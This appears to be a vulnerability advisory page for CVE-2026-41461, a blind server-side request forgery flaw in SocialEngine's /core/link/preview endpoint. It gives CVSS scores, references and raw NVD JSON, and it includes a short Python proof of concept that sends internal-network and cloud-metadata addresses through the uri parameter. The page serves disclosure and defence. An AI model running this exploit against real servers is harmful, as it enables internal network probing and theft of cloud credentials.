CVE-2026-41461

Description

SocialEngine versions 7.8.0 and prior contain a blind server-side request forgery vulnerability in the /core/link/preview endpoint where user-supplied input passed via the uri request parameter is not sanitized before being used to construct outbound HTTP requests. Authenticated remote attackers can supply arbitrary URLs including internal network addresses and loopback addresses to cause the server to issue HTTP requests to attacker-controlled destinations, enabling internal network enumeration and access to services not intended to be externally reachable.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:socialengine:socialengine:*:*:*:*:*:*:*:* - VULNERABLE

SocialEngine <= 7.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (SocialEngine instance)
target = "http://socialengine.example.com/core/link/preview"

# Attacker's controlled server for Out-of-Band detection or internal IP
internal_ip = "http://192.168.1.1/admin"
# Or use a metadata service like: http://169.254.169.254/latest/meta-data/

# Payload parameters
params = {
    "uri": internal_ip,
    "format": "json"
}

# Authenticated session cookies (Required as per PR:L)
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

try:
    response = requests.get(target, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check server logs or OOB listener for confirmation.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41461
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41461
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41461/
[4] VulDB https://vuldb.com/cve/CVE-2026-41461
[5] https://karmainsecurity.com/KIS-2026-07
[6] https://socialengine.com
[7] https://www.vulncheck.com/advisories/socialengine-blind-ssrf-via-core-link-preview
[8] http://seclists.org/fulldisclosure/2026/Apr/11

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41461", "sourceIdentifier": "[email protected]", "published": "2026-04-23T15:37:24.683", "lastModified": "2026-04-29T20:16:30.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SocialEngine versions 7.8.0 and prior contain a blind server-side request forgery vulnerability in the /core/link/preview endpoint where user-supplied input passed via the uri request parameter is not sanitized before being used to construct outbound HTTP requests. Authenticated remote attackers can supply arbitrary URLs including internal network addresses and loopback addresses to cause the server to issue HTTP requests to attacker-controlled destinations, enabling internal network enumeration and access to services not intended to be externally reachable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:socialengine:socialengine:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.8.0", "matchCriteriaId": "6DA45DC7-D181-4DD5-929A-8EC5639C539B"}]}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2026-07", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://socialengine.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/socialengine-blind-ssrf-via-core-link-preview", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/11", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}